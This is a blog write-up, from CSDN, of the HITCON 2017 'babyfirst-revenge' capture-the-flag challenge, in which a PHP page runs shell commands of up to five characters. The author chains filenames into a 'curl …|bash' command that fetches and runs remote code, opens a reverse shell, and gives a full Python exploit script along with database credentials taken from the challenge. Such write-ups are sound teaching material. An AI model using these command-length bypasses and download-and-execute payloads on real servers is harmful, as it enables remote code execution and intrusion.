HITCON2017-Web-writeup

最新推荐文章于 2021-05-02 23:52:51 发布
最新推荐文章于 2021-05-02 23:52:51 发布
阅读量1.5k 收藏
点赞数
分类专栏: CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scnu_jiechao/article/details/102763174
版权

HITCON2017-Web-writeup

Problems

babyfirst-revenge

Description:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

From the description, we know that @exec($_GET[‘cmd’]) can be used to get shell, but the length of each command has to be <= 5.

My idea is:

  1. Prepare a service nc -lvp 8080 in WAN;
  2. Prepare a reverse shell text in our own server;
  3. Get reverse shell from our own server;

How to get the reverse shell from our own server? We can follow this idea:

curl aabbcccc.cn|bash

Put the command above into a file g on the game’s server, and then use sh g to execute.

How to put the file?
Generate a few files with specific names, use \ to connect them, then

ls -t>g

How to generate?

>name

How to execute ls -t>g?
In the same way, put it into a file _.

# "ls" > _, " -t>g" >> _
# ls\
#  \
# -t\
# >g
>ls\\
ls>_
>\ \\
>-t\\
>\>g
ls>>_

Tips: the order in CentOS’s default shell is different from php, which use LC_COLLATE=C.

Get shell in the same way:

>sh
>ba\\
>\|\\
>cn\\
>c.\\
>cc\\
>bc\\
>bb\\
>aa\\
>\ \\
>rl\\
>cu\\

Execute:

sh _
sh g

Exp:

import requests
from urllib import quote

url = 'http://117.50.3.97:8001/'

payload = [
    '>ls\\\\',
    'ls>_',
    '>\ \\\\',
    '>-t\\\\',
    '>\>g',
    'ls>>_',
    '>sh',
    '>ba\\\\',
    '>\|\\\\',
    '>cn\\\\',
    '>c.\\\\',
    '>cc\\\\',
    '>bc\\\\',
    '>bb\\\\',
    '>aa\\\\',
    '>\ \\\\',
    '>rl\\\\',
    '>cu\\\\',
    'sh _',
    'sh g'
]

res = requests.get(url + '?reset=')
for cmd in payload:
    x = url + '?cmd=' + quote(cmd)
    print(x)
    res = requests.get(x)

Tips:

  1. file .xx will not appear in ls -t, because it will be hidden;
  2. |, ’ '(blank) need \ in shell;
  3. \ in python need one more;

After get the reverse shell, we find a folder fl4444g in /home and there is a README.txt in fl4444g, which shows:

Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr

Connect mysql:

mysql -ufl4444g -pSugZXUtgeJ52_Bvr

Show databases:

show databases;
s;
ERROR 1064 (42000) at line 2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's' at line 1
Database
information_schema
fl4gdb

Show tables:

use fl4gdb;
show tables;
s;
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's' at line 1
Tables_in_fl4gdb
Tables_in_fl4gdb
this_is_the_fl4g

Dump:

use fl4gdb;
select * from this_is_the_fl4g;
s;
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's' at line 1
secret
flag{bf4a0a1a-226c-4e20-b3a1-0398ba83278f}

The database’s interaction is not friendly, which make me to think that there are some problems to connect.

jchalex
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
master php,[hitcon2017] Baby^H-master-php-2017 复现
weixin_39625098的博客
03-13 306
分享本题自制Dockerfile : Github这题在比赛过程是0解......真的太难了...体现了Orange大大对php和中间件的深刻理解Orz 膜拜题目源码:$FLAG = create_function("", 'die(`/read_flag`);');$SECRET = `/read_secret`;$SANDBOX = "/var/www/data/" . md5("orange...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
HITCON-Training-Writeup
baikeng3674的博客
03-14 553
HITCON-Training-Writeup 原文链接[email protected] 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
HITCON 2017 babyfirst-revenge(命令执行绕过二)
郁离歌丶的博客
04-30 990
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
HITCON2017 babyfirst-revenge
forbidd3n,keep going
07-01 3232
初看这题,完全没有思路???!!!没辙,只能找大佬,看了网上各路大神的思路,从看不懂writeup到慢慢理解原理,学习了~多数writeup思路差不多,总归是利用\来多次输入命令,绕过长度限制,有的人直接curl xxx(不用ls -t这个我没有成功,因为是在构造不出ip地址各种进制的序列问题),痛苦~~关键一:绕过5位长度限制要想绕过长度限制执行多条命令,显然会想到先将命令放到文件中取执行。第一...
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
台灣駭客年會 HITCON CMT 2017 - 安全技术资料汇总(共3份).zip
02-06
Breaking_into_the_iCloud_Keychain.pdf CSCS_以技術力協助公民社會的初次嘗試.pdf 臺灣資安人才教育_Cybersecurity_Education_in_Taiwan.pdf
HITCON-Badge:HITCON徽章相关文件
04-29
(非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的硬盘。 用作...
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
HITCON 2017 babyfirst-revenge(命令执行绕过一)
郁离歌丶的博客
04-28 2793
院科协换届...10点才去大活打开电脑...修炼第一天怕是只能看个题了....题目链接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_1/Chall_1.md审计了一下,大概就是考linux命令执行的绕过,命令长度限制了。直接对着代码想了好久,无果。梅子酒说先搭起环境来,再慢慢搞。WEB学习第一步:搭环境,改bug...
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2765
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
[HITCON 2017]SSRFme
feng的博客
12-12 987
知识点 代码审计 SSRF WP 其实是一道很简单的SSRF的题目,但是自己又没完完全全的做出来,卡在了一些奇奇怪怪的地方。 首先进入环境审一下代码: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; }
[BUUCTF][HITCON 2017]SSRFme
Y4tacker的博客
10-03 6022
文章目录知识点新学会的函数代码审计 知识点 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 新学会的函数 pathinfo 代码审计 前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行, 命令执行的结果会被存入我们以filename参数的值命名的文件里 <?php if (isset
[HITCON 2017]SSRFme ctf web buuctf
wuyaowangchuan的博客
11-12 487
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/..
i春秋2017第二届广东省强网杯线上赛Nonstandard题目writeup
iqiqiya的博客
08-20 1422
0x01:运行之后就提示让输入flag   如果输入不正确 就退出   0x02:PEiD查壳发现没有加壳  VC的程序     0x03:IDA载入分析  关键字符串  双击进入       双击进入   F5大法  找到关键代码   既然关键在于sub_401480这个函数   那就双击进入一探究竟   现在就明白了  我们的input经过sub_...
perl脚本中GET命令执行漏洞([HITCON 2017]SSRFme)
qq_45521281的博客
04-30 2796
GET命令执行漏洞 思路来自于HITCON2017中的ssrfme,考点是GET的任意命令执行。代码很简单,调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。 我不知道关于这个问题最早是什么时候爆出的了,但确实已经很多年了。 root@iZ285ei82c1Z:~/test# cat a.pl open(FD, "|id"); print <FD...
hitcon_2017_ssrfme
o3Ev的博客
05-02 363
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值